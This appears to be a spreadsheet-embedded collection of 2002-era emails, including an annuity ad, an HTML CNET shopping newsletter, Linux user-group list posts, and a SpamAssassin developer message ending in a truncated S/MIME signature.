 width=3D"327" height=3D"116" alt=3D"M and O Marketing"&gt;&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr&gt;=20
           &lt;td&gt;&lt;font size=3D"1" face=3D"Arial, Helvetica, =
 sans-serif"&gt;Offer expires=20
             July 31, 2002. No limit to how much extra cash you can earn. =
 Offer=20
             Subject to change without notice. Products not available in =
 all states.=20
             *Issued as the FlexDex Annuity in CT. Bonuses issued from =
 M&amp;amp;O=20
             Marketing on paid, issued business. &lt;br&gt;
             BonusDex Annuity is not available in: MA, OR, PA, WA and WI. =
 Power=20
             7 is not available in: AL, IN, ME, NJ, OR, PA and WA. =
 POWERHOUSE is=20
             not available in: ND, OR, SC and WA. FlexDex is not =
 available in:=20
             ND, OR, SC and WA. For agent use only.&lt;/font&gt;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&lt;/body&gt;
 &lt;/html&gt;
 ------=_NextPart_000_646288_01C20FAE.3A8A1810--
</t>
  </si>
  <si>
    <t xml:space="preserve">
 &lt;html&gt;
 &lt;head&gt;
 	&lt;title&gt;CNET Shopper Newsletter: Desktops &amp; Notebooks Edition&lt;/title&gt;
 &lt;/head&gt;
 &lt;body bgcolor="#EEEEEE" alink="#0000FF" vlink="#0000FF"&gt;
 &lt;div align="center"&gt;
 &lt;A href="top"&gt;&lt;/A&gt;&lt;!-- header --&gt;
 	&lt;table cellpadding=0 cellspacing=0 border=0 width=612 bgcolor="#ffffff"&gt;
 	&lt;tr valign=top&gt;
 		&lt;td width=442 colspan=4&gt;
 			&lt;img src="http://www.cnet.com/i/nl/sh/hd_desknote.gif" width="442" height="60" border="0" alt="CNET Shopper Newsletter: Desktops &amp; Notebooks Edition"&gt;&lt;br&gt;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&lt;div align="center"&gt;&lt;img src="http://i.i.com.com/cnwk.1d/Ads/common/advertisement.gif" width="120" height="10" border="0"&gt;&lt;/br&gt;
 &lt;a href="http://clickthru.online.com/Click?q=ed-jLlvQgV7qkMOZ0rxv3orMjEsaQuR" target="new"&gt;   
 &lt;img src="http://www.techrepublic.com/images/ads/Dell.sky.sweet.gif" width="160" height="600" border="0"&gt;
 &lt;/a&gt;&lt;/div&gt;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href="http://clickthru.online.com/Click?q=02-qia9IljjNkEklL-_XGuwrfzJ6nsR" &gt;Canon PowerShot S40&lt;/a&gt;&lt;br&gt;&lt;/td&gt;
 	&lt;/tr&gt;
 	&lt;tr&gt;
 		&lt;td align=right&gt;&lt;FONT face="arial, helvetica" size=-1&gt;2&lt;/td&gt;
 		&lt;td&gt;&lt;FONT face="arial, helvetica" size=-1&gt;&lt;a href="http://clickthru.online.com/Click?q=17-agitI5XQeDiM4KdIz4s1RhjGRsZR" &gt;Canon PowerShot G2&lt;/a&gt;&lt;br&gt;&lt;/td&gt;
 	&lt;/tr&gt;
 	&lt;tr&gt;
 		&lt;td align=right&gt;&lt;FONT face="arial, helvetica" size=-1&gt;3&lt;/td&gt;
 		&lt;td&gt;&lt;FONT face="arial, helvetica" size=-1&gt;&lt;a href="http://clickthru.online.com/Click?q=2c-DatOIc0kqhES2DNc-r7MBvWpjudR" &gt;Gateway 600XL&lt;/a&gt;&lt;br&gt;&lt;/td&gt;
 	&lt;/tr&gt;
 	&lt;tr&gt;
 		&lt;td align=right&gt;&lt;FONT face="arial, helvetica" size=-1&gt;4&lt;/td&gt;
 		&lt;td&gt;&lt;FONT face="arial, helvetica" size=-1&gt;&lt;a href="hhttp://shopper.cnet.com/shopping/resellers/0-7058426-311-8221154-0.html"&gt;Dell Latitude C400&lt;/a&gt;&lt;br&gt;&lt;/td&gt;
 	&lt;/tr&gt;
 	&lt;tr&gt;
 		&lt;td align=right&gt;&lt;FONT face="arial, helvetica" size=-1&gt;5&lt;/td&gt;
 		&lt;td&gt;&lt;FONT face="arial, helvetica" size=-1&gt;&lt;a href="http://clickthru.online.com/Click?q=41-qqJ1IEKzoKGXL8wU5CfCkxHB0FrR" &gt;Cyber Shot DSC-F707&lt;/a&gt;&lt;br&gt;&lt;/td&gt;
 	&lt;/tr&gt;
 &lt;/table&gt; 
 &lt;table border="0" cellpadding="0" cellspacing="0" width="160"&gt;
 	&lt;tr&gt;
 		&lt;td&gt;&lt;a href="http://clickthru.online.com/Click?q=56-NwKYInnwtkMSBcorctPQDwwaMCiR" &gt;&lt;img src="http://www.cnet.com/i/fd/yl_arrow.gif" width="13" height="13" border="0" alt=" " align="absbottom" valign="bottom"&gt;&lt;/a&gt;&amp;nbsp;
 		&lt;a href="http://clickthru.online.com/Click?q=6c-SUL3IuP88_1F8tjKQCL5-NPyEdnR" &gt;&lt;b valign="top" class="m1"&gt;&lt;FONT face="arial, helvetica" size=-1&gt;All most popular&lt;/b&gt;&lt;/a&gt;&lt;/td&gt;
 	&lt;/tr&gt;
 &lt;/table&gt;
 &lt;br&gt;
 						&lt;/font&gt;
 					&lt;/FONT&gt;
 &lt;!-- /Most Popular --&gt;
 &lt;BR&gt;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&lt;img src="http://www.cnet.com/i/sh/nl/desktops_031.gif"&gt;&lt;/td&gt;
 											&lt;/td&gt;
 										&lt;/tr&gt;
 								&lt;/table&gt;
 &lt;!--Prime Feature--&gt;			&lt;table&gt;
 									&lt;TR&gt;
 										&lt;/TD&gt;
 									&lt;/TR&gt;
 									&lt;tr&gt;
 										&lt;td&gt;&lt;img src="http://www.cnet.com/b.gif" width=1 height=8&gt;&lt;/td&gt;
 									&lt;/tr&gt;
 									&lt;TR&gt;
 										&lt;TD&gt;
 											&lt;a href="http://clickthru.online.com/Click?q=81-z1IaQ-KpQspSuoLpqfRO9R6BpKcR" &gt;&lt;IMG SRC="http://www.cnet.com/i/co/ps/200/20117910_200_1.gif" BORDER=0&gt;&lt;/A&gt;
 										&lt;/TD&gt;
 										&lt;TD valign=center&gt;&lt;font face="arial, helvetica" size="-1"&gt;
 											&lt;a href="http://clickthru.online.com/Click?q=96-pjdWQtdhd95Ky1sjZWSoS2P4JmRR" &gt;&lt;B&gt;Atlas Micro GS 9800&lt;/B&gt;&lt;/a&gt;&lt;BR&gt;
 											&amp;#149; Pentium 4 2.53 GHz&lt;BR&gt;
 											&amp;#149; 512MB DDR SDRAM&lt;BR&gt;
 											&amp;#149; 40GB hard drive&lt;BR&gt;
 											&amp;#149; CD-RW/DVD-ROM&lt;BR&gt;
 											&amp;#149; 19-inch CRT&lt;BR&gt;
 											&amp;#149; nVidia GeForce4 Ti 4200&lt;BR&gt;
 											&amp;#149; &lt;B&gt;Just &lt;font color="#CC0000"&gt;$2,099&lt;/font&gt;&lt;/B&gt;
 &lt;br&gt;&lt;img src="/b.gif" width="1" height="10" border="0" alt=""&gt;&lt;br&gt;	
 &lt;a href="http://clickthru.online.com/Click?q=ab-ZcQKQYpMbn_dmwyXydit0M-0OvFR" &gt;&lt;img src="http://shopper.cnet.com/i/sh/leaf/checkprices.gif" border=0"&gt;&lt;/a&gt;
 										&lt;/TD&gt;
 									&lt;/TR&gt;
 								&lt;/table&gt;
 								&lt;table cellpadding=0 cellspacing=0 border=0 width=410&gt;
 									&lt;tr colspan=2&gt;
 										&lt;td&gt;&lt;img src="http://www.cnet.com/b.gif" width=1 height=4&gt;&lt;/td&gt;
 									&lt;/tr&gt;
 									&lt;tr colspan=2&gt;
 										&lt;td&gt;&lt;font face="arial, helvetica" size="-1"&gt;
 											&lt;B&gt;Peripherals for your desktop:&lt;/b&gt;
 										&lt;/td&gt;
 									&lt;/tr&gt;
 									&lt;tr&gt;
 										&lt;td&gt;&lt;font face="arial, helvetica" size="-1"&gt;
 										&lt;a href="http://clickthru.online.com/Click?q=c0-kfs-QWP1IwsjNYa41H99K8FZuS9R" &gt;Canon S900 photo printer&lt;/a&gt;
 										&lt;/td&gt;
 										&lt;td&gt;&lt;font face="arial, helvetica" size="-1"&gt;
 										&lt;a href="http://clickthru.online.com/Click?q=d5-p-viQzL249jY6E2HCu4jNix1DPuR" &gt;
 Wacom Intuis2 6X8 tablet&lt;/a&gt;
 										&lt;/td&gt;
 									&lt;/tr&gt;
 										&lt;td&gt;&lt;font face="arial, helvetica" size="-1"&gt;
 										&lt;a href="http://clickthru.online.com/Click?q=eb-HlpoQkDTzhBO2Pcdo6MzbuNK5xFR" &gt;Wireless Keyboard &amp; Mouse&lt;/a&gt; 
 										&lt;/td&gt;
 										&lt;td&gt;&lt;font face="arial, helvetica" size="-1"&gt;
 										&lt;a href="http://clickthru.online.com/Click?q=00-4FQlI9QDB2CQPHcbgi4cHr7W6T9R" &gt;ViewSonic ViewPanel VP 181&lt;/a&gt; 
 										&lt;/td&gt;
 									&lt;/tr&gt;
 									&lt;tr colspan=2&gt;
 										&lt;td&gt;&lt;img src="http://www.cnet.com/b.gif" width=1 height=4&gt;&lt;/td&gt;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1 --&gt;
 							&lt;tr valign="top"&gt;
 								&lt;td width="120"&gt;
 									&lt;a href="http://clickthru.online.com/Click?q=15-mYP_IGcDl2mbnMCAV-hDEc2lRbuR" &gt;&lt;img border=0 src="http://shopper.cnet.com/i/co/ps/120/9723300_120_1.gif"&gt;&lt;/a&gt;
 								&lt;/td&gt;
 								&lt;td width=270 colspan="1" valign="center"&gt;
 								&lt;font face="arial, helvetica" size="-1" &gt;
 								&lt;a href="http://clickthru.online.com/Click?q=2a-CNuWIrIWzgkGsfNabman8WccrYsR" &gt;&lt;B&gt;Gateway 600XL&lt;/b&gt;&lt;/a&gt;&lt;BR&gt;
 								&amp;#149; Pentium 4-M 1.8GHz&lt;BR&gt;
 								&amp;#149; 256MB RAM, 40GB hard drive&lt;BR&gt;
 								&amp;#149; 15.7-inch TFT active matrix&lt;BR&gt;
 								&amp;nbsp;&amp;nbsp;&lt;B&gt;Starting at &lt;font color="#CC0000"&gt;$2,899&lt;/font&gt;  &lt;/B&gt;
 								&lt;/td&gt;
 							&lt;/tr&gt;
 							&lt;tr&gt;
 								&lt;td colspan="2" background="http://www.cnet.com/i/sh/leaf/dots5x7.gif"&gt;&lt;img src="http://www.cnet.com//b.gif" width="409" height="5" alt="" /&gt;&lt;/td&gt;
 							&lt;/tr&gt;
 							&lt;tr&gt;
 								&lt;td width="400" colspan="2"&gt;&lt;img src="http://www.cnet.com/b.gif" width=1 height=5&gt;&lt;/td&gt;
 							&lt;/tr&gt;	
 &lt;!-- Product 2 --&gt;
 							&lt;tr valign="top"&gt;
 								&lt;td width="120"&gt;
 									&lt;a href="http://clickthru.online.com/Click?q=3f-4sAEIqMPaOMsZy7Hcoh57BymNzZR" &gt;&lt;img border=0 src="http://shopper.cnet.com/i/co/ps/120/8582529_120_1.gif"&gt;&lt;/a&gt;
 								&lt;/td&gt;
 								&lt;td width=270 colspan="1" valign="center"&gt;
 								&lt;font face="arial, helvetica" size="-1" &gt;&lt;a href="http://clickthru.online.com/Click?q=54-l6ovIZK3CjTWS-90O9U4lR0vdknR" &gt;&lt;B&gt;Dell Dimension 4000&lt;/b&gt;&lt;/a&gt;&lt;BR&gt;
 								&amp;#149; Pentium 4 1.7GHz to 2.53GHz&lt;BR&gt;
 								&amp;#149; 128MB to 1GB&lt;BR&gt;
 								&amp;#149; Up to 120GB hard drive&lt;BR&gt;
 								&amp;nbsp;&amp;nbsp;&lt;B&gt;Starting at &lt;font color="#CC0000"&gt;$739&lt;/font&gt;    &lt;/B&gt;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href="http://clickthru.online.com/Click?q=69-CY-iIoWOSIRulfPMoAH4OpRzLxrR" &gt;&lt;img border=0 src="http://shopper.cnet.com/i/co/ps/120/9777376_120_1.gif"&gt;&lt;/a&gt;
 								&lt;/td&gt;
 								&lt;td width=270 colspan="1" valign="center"&gt;
 								&lt;font face="arial, helvetica" size="-1" &gt;&lt;a href="http://clickthru.online.com/Click?q=7e-XDXeInp93vEXT_Xi6pURwMpopriR" &gt;&lt;B&gt;Dell Inspiron 2600 series &lt;/b&gt;&lt;/a&gt;&lt;BR&gt;
 								&amp;#149; 1GHz to 1.7GHz&lt;BR&gt;
 								&amp;#149; 128MB to 256MB RAM&lt;BR&gt;
 								&amp;#149; 20GB to 40GB hard drive&lt;BR&gt;
 								&amp;nbsp;&amp;nbsp;&lt;B&gt;Just &lt;font color="#CC0000"&gt;$999&lt;/font&gt; &lt;/B&gt;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href="http://clickthru.online.com/Click?q=93-V4PmQSdrF033nN3cTYjvQ8Rgn5FR" &gt;&lt;img border=0 src="http://shopper.cnet.com/i/co/ps/120/6751983_120_1.gif"&gt;&lt;/a&gt;
 								&lt;/td&gt;
 								&lt;td width=270 colspan="1" valign="center"&gt;
 								&lt;font face="arial, helvetica" size="-1" &gt;&lt;a href="http://clickthru.online.com/Click?q=a8-02XZQQZDjZdiE3TDtZs6swzdON9R" &gt;&lt;B&gt;HP Pavilion n5450 &lt;/b&gt;&lt;/a&gt;&lt;BR&gt;
 								&amp;#149; Pentium III 850MHz&lt;BR&gt;
 								&amp;#149; 128MB RAM, 20GB hard drive&lt;BR&gt;
 								&amp;#149; 15-inch TFT active matrix &lt;BR&gt;
 								&amp;nbsp;&amp;nbsp;&lt;B&gt;Just &lt;font color="#CC0000"&gt;$1,099&lt;/font&gt;    &lt;/B&gt;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href="http://clickthru.online.com/Click?q=be-B7ixQCpFUr1x-WSbnY9y52GfwHRR" &gt;&lt;img border=0 src="http://shopper.cnet.com/i/co/ps/120/8209894_120_1.gif"&gt;&lt;/a&gt;
 								&lt;/td&gt;
 								&lt;td width=270 colspan="1" valign="center"&gt;
 								&lt;font face="arial, helvetica" size="-1" &gt;&lt;a href="http://clickthru.online.com/Click?q=d3-GZHkQJP46HpXx6GK74p01K7fy3FR" &gt;&lt;B&gt;Gateway Solo 1450SE&lt;/b&gt;&lt;/a&gt;&lt;BR&gt;
 								&amp;#149; Intel Celeron 1.2GHz&lt;BR&gt;
 								&amp;#149; 128MB RAM, 20GB hard drive&lt;BR&gt;
 								&amp;#149; 14.1-inch TFT active matrix &lt;BR&gt;
 								&amp;nbsp;&amp;nbsp;&lt;B&gt;Just &lt;font color="#CC0000"&gt;$1,158&lt;/font&gt;    &lt;/B&gt;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&lt;p&gt;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ChannelOnline's StoreSite enables you to
 set up a private storefront with your company name and logo
 in less than an hour?
 &lt;P&gt;
 Your customers can view quotes you have created for them,
 search the product database, build their own quotes based
 on the pricing you've predetermined for them, and place
 orders with you online, 24/7.
 &lt;P&gt;
 Sign up now to give your customers a whole new level of
 service.
 &lt;P&gt;
 &lt;a href="http://clickthru.online.com/Click?q=e8-DOJMQfkjp_ozf0irAP_kMFIM559R" &gt;&lt;B&gt;Tell me more about ChannelOnline.&lt;/b&gt;&lt;/a&gt;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href="http://clickthru.online.com/Click?q=fd-BXDMQgOQ_lZUVP_O_Iti64Q9t8uR" &gt;Tech Trends&lt;/a&gt;
 						&lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=12-jaAKIl-c6lyiXKF-pEvKY-qkCKsR" &gt;Hardware&lt;/a&gt;
 						&lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=27-z9ZmIqI14ReUdusSkMRUVolYrBZR" &gt;Software&lt;/a&gt;
 						&lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=3d-oi9NIbza6XTB4JlvwlGWUTnaNtuR" &gt;Shopping&lt;/a&gt;
 						&lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=52-LUXoIrJ9IRqzZtcMWz8AtIQwjjsR" &gt;Downloads&lt;/a&gt;
 					&lt;/ul&gt;&lt;/b&gt;
 				&lt;/font&gt;
 			&lt;/td&gt;
 			&lt;td&gt;
 				&lt;font face="arial, helvetica" size="-1"&gt;&lt;b&gt;
 					&lt;ul&gt;
 						&lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=67-PnDkIOEkRnQusxlWhKPAKa1CPIPR" &gt;News&lt;/a&gt;
 						&lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=7c-7NCZIZWXNNbyBTgfLHDx1984BOnR" &gt;Investing&lt;/a&gt;
 						&lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=91-EZnpQAzVc_Ona6eMzb-Byo4hJdcR" &gt;Electronics&lt;/a&gt;
 						&lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=a6-9zw4QCUpLIU6CCTOvAKcnvjbgwRR" &gt;Web Building&lt;/a&gt;
 						&lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=bb-yT94QYZpCMY-TF_RaT-Dc13yE_FR" &gt;Help &amp; How-Tos&lt;/a&gt;
 					&lt;/ul&gt;&lt;/b&gt;
 				&lt;/font&gt;
 			&lt;/td&gt;
 			&lt;td&gt;
 				&lt;font face="arial, helvetica" size="-1"&gt;&lt;b&gt;
 					&lt;ul&gt;
 						&lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=d0-vjDhQWWTQ2m2nLD7c7YuNDxuyC9R" &gt;Internet&lt;/a&gt;
 						&lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=e5-9Z7OQgyslCGvgwEjnbcumX6cvbuR" &gt;Games&lt;/a&gt;
 						&lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=fa-FmqNQhO1bOM0ZOetvDA4oSMpoLsR" &gt;Message Boards&lt;/a&gt;
 						&lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=10-YU9qI9Ns0-c1xIHPffACEH5fCA9R" &gt;CNET TV &amp; Radio&lt;/a&gt;
 						&lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=25-inepIbdc-LJ45p3ZTscR7jeQrFuR"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href="http://clickthru.online.com/Click?q=3a-QAmgIrzkj150mnv7JR1rqAFZcCsR" &gt;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HREF='http://clickthru.online.com/Click?q=4f-Ian4zqU4_vVwG2YYOpn8w1H10aI2OsRR'&gt;Unsubscribe&lt;/A&gt;&amp;nbsp;|
 &amp;nbsp;&lt;a href='http://www.cnet.com/subscription/0-16335-7-8494915.html?EmailAddr=qqqqqqqqqq-cnet-newsletters@spamassassin.taint.org'&gt;Change e-mail format&lt;/a&gt;&amp;nbsp;|
 &amp;nbsp;&lt;a href="http://clickthru.online.com/Click?q=64-UBOhIuLecuwWdQiNGWF8w6YrPhnR" &gt;Change e-mail address&lt;/A&gt;|
 &amp;nbsp;&lt;a href="http://clickthru.online.com/Click?q=79-rsQHIEBe5mNic4QmFz_e0CvgparR" &gt;FAQ&lt;/A&gt;&amp;nbsp;|
 &amp;nbsp;&lt;a href="http://clickthru.online.com/Click?q=8e-Ve-cQCnqnX6YMi_PDuYWD0V_WyRR" &gt;Advertise&lt;/A&gt;&lt;br&gt;&lt;/font&gt;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href="http://clickthru.online.com/Click?q=a4-HGTsQ6p4mTC1OlG463LvvI2rgYdR" &gt;&lt;img src="http://www.cnet.com/i/dp/smrb.gif" width="37" height="37" border="0"&gt;&lt;/a&gt;&lt;/td&gt;
 &lt;td width="563" nowrap&gt;&lt;font face="arial, helvetica" size="-1"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=b9-WWcsQ-B4MTxVB-Ah8FdMkmoOwzcR" &gt;&lt;font color="#000000"&gt;Price comparisons&lt;/font&gt;&lt;/a&gt; |
 &lt;a href="http://clickthru.online.com/Click?q=ce-Sd0CQMsHsEkKDSe3ufz1Jey2fPRR" &gt;&lt;font color="#000000"&gt;Product reviews&lt;/font&gt;&lt;/a&gt; |
 &lt;a href="http://clickthru.online.com/Click?q=e3-ze2WQkVDQ-74YLG-JM2mPpt29eFR" &gt;&lt;font color="#000000"&gt;Tech news&lt;/font&gt;&lt;/a&gt; |
 &lt;a href="http://clickthru.online.com/Click?q=f8-57BSQfscKT48FWopiaRL6DCwol9R" &gt;&lt;font color="#000000"&gt;Downloads&lt;/font&gt;&lt;/a&gt; |
 &lt;a href="http://clickthru.online.com/Click?q=0d-3aGuIbr1Rb7GC2tNv0T0QkY6b7uR"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src="http://gserv-cnet.zdnet.com/clear/outbound.gif?APPID=2&amp;EMID=25136487&amp;NL=e439&amp;ISSUE=2002-07-19" height=1 width=1&gt;    &lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;  &lt;td colspan=2&gt;&lt;font face=Arial, Helvetica, sans-serif size=2&gt;    &lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;
 &lt;/a&gt;.&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;
 &lt;!-- ### /footer ### --&gt;
 &lt;/body&gt;
 &lt;/html&gt;
 &lt;IMG HEIGHT=1 WIDTH=1 SRC="http://clickthru.online.com/Click?q=23-sFrGnHM-nMZ1nOWQ3gj6tud1jRRR"&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">On Saturday 28 September 2002 04:37 pm, you struggled free to say:
 &amp;&gt; &gt; Although it's like a total shock to 99.999% (5nines) of all the
 &amp;&gt; &gt; employed website designers out there, the truth is webforms /can/
 &amp;&gt; &gt; accept "U.S. of A" as a country.  Incredible, but true.  Web forms can
 &amp;&gt; &gt; also accept /multiple/ or even /free-form/ telephone numbers and can
 &amp;&gt; &gt; even be partitioned into manageable steps. All this can also be done
 &amp;&gt; &gt; without selling exclusive rights to your wallet to the World's
 &amp;&gt; &gt; Second-Richest Corporation (assuming Cisco is still #1) and vendor
 &amp;&gt; &gt; locking your business into their "small transaction fee" tithe.
 Think of all the people and places that would not get unsolicited mail
 if we hadn't invented them.  Though perhaps ordering a free Enron mug
 as the King of Hell....
 I think it's like P3P met whatever commercial /.like forum was rocking
 yesterday, and they took all Greg's extra serotonin and lit up and
 made a Successful go of personal address palettes you could occupy and
 own or rent and even move or sell.  So you'd reply to all the whitepaper
 sites you wouldn't just call to get the real deal like: 'Okay, let's say
 I'm in Factorytown, GuangZhou, and I'm a battery acid supervisor for
 a multinational that sometimes buys B1s.  e-mail me if you get your story
 written up all the way;' or
 	'Today, I'm a 200lb, 3m tall mophead with pearlecent teeth
 and excellent sex-linked features, but who uses Solaris nntp clients.  Got it?'
  or merely
 	'I can't read Base64 messages.  I use small alphabets and
 8-letter words that didn't come from the bible and use calculus, and
 I'd thank you to class me as a Catamite.'
 &amp;&gt; Yes, but this is what normally happened:
 &amp;&gt; Engineer: we can put an input validator/parser on the backend to do that.
 &amp;&gt; 	.....
 &amp;&gt; Creative Director: I don't give a shit. As long as it's in blue. And
 &amp;&gt; has a link to my press release.
 N3kk1D PRR3zzEw33Lz ahR 3V1L, but I thought it had to do with
 coldfusion-compatiblie plugins (servlets, whatever) that overhyped
 unimplemented features.  Repeatedly.  Openly.  In rakish 10MB
 branding-first downloads that meshed well with budgeting policies.
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: RE: [ILUG-Social] Online Bookstores
</t>
  </si>
  <si>
    <t xml:space="preserve">What's wrong with good ol' www.eason.ie ?
 Delivery isn't too expensive, and they seem to have a reasonable stocklist
 ... not only that, but they've got b&amp;m[0] stores too ...
 P
 [0] Bricks 'n' Mortar
 &gt; -----Original Message-----
 &gt; &gt; On Tue, Aug 06, 2002 at 04:21:22 +0100, David O'Callaghan wrote:
 &gt; &gt; &gt; 
 &gt; &gt; &gt; Hello,
 &gt; &gt; &gt; 
 &gt; &gt; &gt; What are your recommendations for buying books (technical and
 &gt; &gt; &gt; otherwise) online, from Irish or European sellers. Is there 
 &gt; &gt; &gt; anywhere that has as good a selection as, say, Amazon but
 &gt; &gt; &gt; deals in Euro?
 &gt; 
 -- 
 Irish Linux Users' Group Social Events: social@linux.ie
 http://www.linux.ie/mailman/listinfo/social for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">This is a multi-part message in MIME format.
 ------=_NextPart_000_0088_01C24EA2.FC21D7A0
 Content-Type: text/plain;
 	charset="Windows-1252"
 Content-Transfer-Encoding: 7bit
 Justin Mason wrote:
 &gt; OK guys -- I reckon it's now Good Enough, modulo some minor score
 &gt; tweaking, or commenting of some more broken/high-FP-ing rules.
 &gt;
 &gt; What do you all think?  are we ready to go?  anyone run into any trouble
 &gt; with the new autoconf code, or found a bug from the merge of that spamc
 &gt; BSMTP-support patch?
 I just checked out b2_4_0 from CVS and 'make test' fails horribly.
 It seems to be looking in my site_perl SpamAssassin code, not the build
 directory.
 Example error:
 Failed to run FROM_AND_TO_SAME_5 SpamAssassin test, skipping:
         (Can't locate object method "check_for_from_to_same" via package
 "Mail::SpamAssassin::PerMsgStatus" at
 /usr/local/lib/perl5/site_perl/5.8.0/Mail/SpamAssassin/PerMsgStatus.pm line
 1701.
 )
 Anyone else seeing this?
 rOD.
 --
 "If you're dumb, surround yourself with smart people;
  and if you're smart, surround yourself with smart people
  who disagree with you."
 Doing the blogging thang again at http://www.groovymother.com/ &lt;&lt;
 ------=_NextPart_000_0088_01C24EA2.FC21D7A0
 Content-Type: application/x-pkcs7-signature;
 	name="smime.p7s"
 Content-Transfer-Encoding: base64
 Content-Disposition: attachment;
 	filename="smime.p7s"
 MIAGCSqGSIb3DQEHAqCAMIACAQExCzAJBgUrDgMCGgUAMIAGCSqGSIb3DQEHAQAAoIIJIjCCAnow
 ggHjoAMCAQICARcwDQYJKoZIhvcNAQEFBQAwUzELMAkGA1UEBhMCVVMxHDAaBgNVBAoTE0VxdWlm
 YXggU2VjdXJlIEluYy4xJjAkBgNVBAMTHUVxdWlmYXggU2VjdXJlIGVCdXNpbmVzcyBDQS0xMB4X
 DTAyMDQxODE1MjkzN1oXDTIwMDQxMzE1MjkzN1owTjELMAkGA1UEBhMCVVMxFjAUBgNVBAoTDUdl
 b1RydXN0IEluYy4xJzAlBgNVBAMTHkdlb1RydXN0IFRydWUgQ3JlZGVudGlhbHMgQ0EgMjCBnzAN
 BgkqhkiG9w0BAQEFAAOBjQAwgYkCgYEAspcspZISpYX/aJqWoYcSyyGqFby3OvsepRzLRU0ENDJR
 wJo7DwFpirRFOUQkTkKXsY6BQzX/CeCRrn9i4ny5gcXuI2JSyrSmDwobbwl52n5cPEbHGcebybWd
 KfAf8vvkxYUnTmDZPtt2ob5RNpJTeTiq9MpNCB/5G7Ocr1hEljcCAwEAAaNjMGEwDgYDVR0PAQH/
 BAQDAgHGMB0GA1UdDgQWBBQig0tNIAIMMfR8WrAaTRXIeF0RSTAPBgNVHRMBAf8EBTADAQH/MB8G
 A1UdIwQYMBaAFEp4MlIR21kWNl7fwRQ2QGpHfEyhMA0GCSqGSIb3DQEBBQUAA4GBACmw3z+sLsLS
 fAfdECQJPfiZFzJzSPQKLwY7vHnNWH2lAKYECbtAFHBpdyhSPkrj3KghXeIJnKyMFjsK6xd1k1Yu
 wMXrauUH+HIDuZUg4okBwQbhBTqjjEdo/cCHILQsaLeU2kM+n5KKrpb0uvrHrocGffRMrWhz9zYB
 lxoq0/EEMIICgjCCAeugAwIBAgIBBDANBgkqhkiG9w0BAQQFADBTMQswCQYDVQQGEwJVUzEcMBoG
 A1UEChMTRXF1aWZheCBTZWN1cmUgSW5jLjEmMCQGA1UEAxMdRXF1aWZheCBTZWN1cmUgZUJ1c2lu
 ZXNzIENBLTEwHhcNOTkwNjIxMDQwMDAwWhcNMjAwNjIxMDQwMDAwWjBTMQswCQYDVQQGEwJVUzEc
 MBoGA1UEChMTRXF1aWZheCBTZWN1cmUgSW5jLjEmMCQGA1UEAxMdRXF1aWZheCBTZWN1cmUgZUJ1
 c2luZXNzIENBLTEwgZ8wDQYJKoZIhvcNAQEBBQADgY0AMIGJAoGBAM4vGbwXt3fek6lfWg0XTzQa
 DJj0ItlZ1MRoRvC0NcWFAyDGr0WlIVFFQesWWDYyb+JQYmT5/VGcqiTZ9J2DKocKIdMSODRsjQBu
 WqDZQu4aIZX5UkxVWsUPOE9G+m34LjXWHXzr4vCwdYDIqROsvojvOm6rXyo4YgKwEnv+j6YDAgMB
 AAGjZjBkMBEGCWCGSAGG+EIBAQQEAwIABzAPBgNVHRMBAf8EBTADAQH/MB8GA1UdIwQYMBaAFEp4
 MlIR21kWNl7fwRQ2QGpHfEyhMB0GA1UdDgQWBBRKeDJSEdtZFjZe38EUNkBqR3xMoTANBgkqhkiG
 9w0BAQQFAAOBgQB1W6ibAxHm6VZMzfmpTMANmvPMZWnmJXbMWbfWVMMdzZmsGd20hdXgPfxiIKeE
 S1hl8eL5lSE/9dR+WB5Hh1Q+WKG1tfgq73HnvMP2sUlG4tega+VWeponmHxGYhTnyfxuAxJ5gDgd
 SIKN/Bf+KpYrtWKmpj29f5JZzVoqgrI3eTCCBBowggODoAMCAQICAxAAdTANBgkqhkiG9w0BAQQF
 ADBOMQswCQYDVQQGEwJVUzEWMBQGA1UEChMNR2VvVHJ1c3QgSW5jLjEnMCUGA1UEAxMeR2VvVHJ1
 c3QgVHJ1ZSBDcmVkZW50aWFscyBDQSAyMB4XDTAyMDgwNzE3MzA1NloXDTAzMDgyMTE3MzA1Nlow
 ggHQMQswCQYDVQQGEwJVUzFJMEcGA1UEChNAR2VvVHJ1c3QgVHJ1ZSBDcmVkZW50aWFscyBDdXN0
 b21lciAtIE9yZ2FuaXphdGlvbiBub3QgdmFsaWRhdGVkLjE/MD0GA1UECxM2Q1BTIHRlcm1zIGlu
 Y29ycG9yYXRlZCBieSByZWZlcmVuY2UgbGlhYmlsaXR5IGxpbWl0ZWQuMUkwRwYDVQQLE0BTZWUg
 VHJ1ZSBDcmVkZW50aWFscyBFeHByZXNzIENQUyB3d3cuZ2VvdHJ1c3QuY29tL3Jlc291cmNlcy9D
 UFMuMS0wKwYDVQQLEyRFbWFpbCBjb250cm9sIHZhbGlkYXRlZCBieSBHZW9UcnVzdC4xPzA9BgNV
 BAsTNklkZW50aXR5IGF1dGhlbnRpY2F0ZWQgYnkgUmVnaXN0cmF0aW9uIEF1dGhvcml0eSAoUkEp
 LjFCMEAGA1UECxQ5UmVnaXN0cmF0aW9uIEF1dGhvcml0eSAoUkEpIC0gcm9kLWdlb3RydXN0QGFy
